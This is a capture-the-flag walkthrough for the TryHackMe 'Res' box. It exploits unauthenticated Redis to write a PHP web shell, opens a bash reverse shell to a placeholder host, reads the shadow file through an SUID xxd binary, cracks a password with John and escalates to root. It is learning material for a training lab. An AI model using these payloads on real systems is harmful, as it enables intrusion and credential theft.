Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!
Let’s start of by scanning all ports using Nmap:
We can then run a version scan with default scripts to enumerate these ports further:
Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.
Port 80: Apache Web Server:
Let’s checkout the web server on port 80:
OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.
Port 6379 Redis 6.0.7:
Regis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Regis as below:
To start with we need to download redis-tools, so we can have access to redis-cli:
sudo apt-get install redis-toolsTo start redis-tools, from the command line we enter:
redis-cli -h [IP ADDRESS]By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command.
From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:
To achieve RCE we need to know the web directory, so we can initially assume that it will be /var/www/html.
Using the above as a POC, we can try writing our RCE:
In Firefox we can navigate to [IP ADDRESS]/redis.php:
We can see that redis.php does indeed run phpinfo().
Let’s try this with another php script to run commands:
<? php system($_GET['cmd']); ?>In redis-cli, we can simply overwrite the previous php file with this code and try RCE.
Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:
And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.
To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.
"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"
One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:
To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts.
And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag.
Use Pwncat we can change to a local shell using ‘CTLR D’ and run the built-in privesc script for simple enumeration by entering ‘privesc -l’ to list all the attack vectors.
The results show a binary xxd with the SUID bit set and the owner is root. We can probably exploit this to read a file with full root privileges. The go to choice for Linux binary exploits is GTFOBins.
Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file as the SUID bit set. I may be possible to read the shadow file and extract the hash for user vianka and we if we can brute force the hash to get the password.
Using this exploit we can print out the contents of the shadow file and copy Vianka hash. If I can brute force the hash using John we can simply SU as user Vianka.
Brute Forcing Vianka’s Hash with John:
To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.
unshadow passwd.txt shadow.txt > hash.txtUsing john we can initially try to brute force the hash.txt file using the standard John wordlists before moving on to other wordlists such as rockyou.txt:
john hash.txt
We now have the password for user vianka, so we can simply ‘su vianka’ to change user to vianka:
Runing `sudo -l`, we can see that vianka has full access and can run all commands, basically the same rights as root. To escalate to root all we need to do is run ‘sudo su’ to change our user to root:
And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before. A big thank you to Stuxnet for creating this box and to TryHackMe for such an excellent platform for Noobs such as me to learn on.
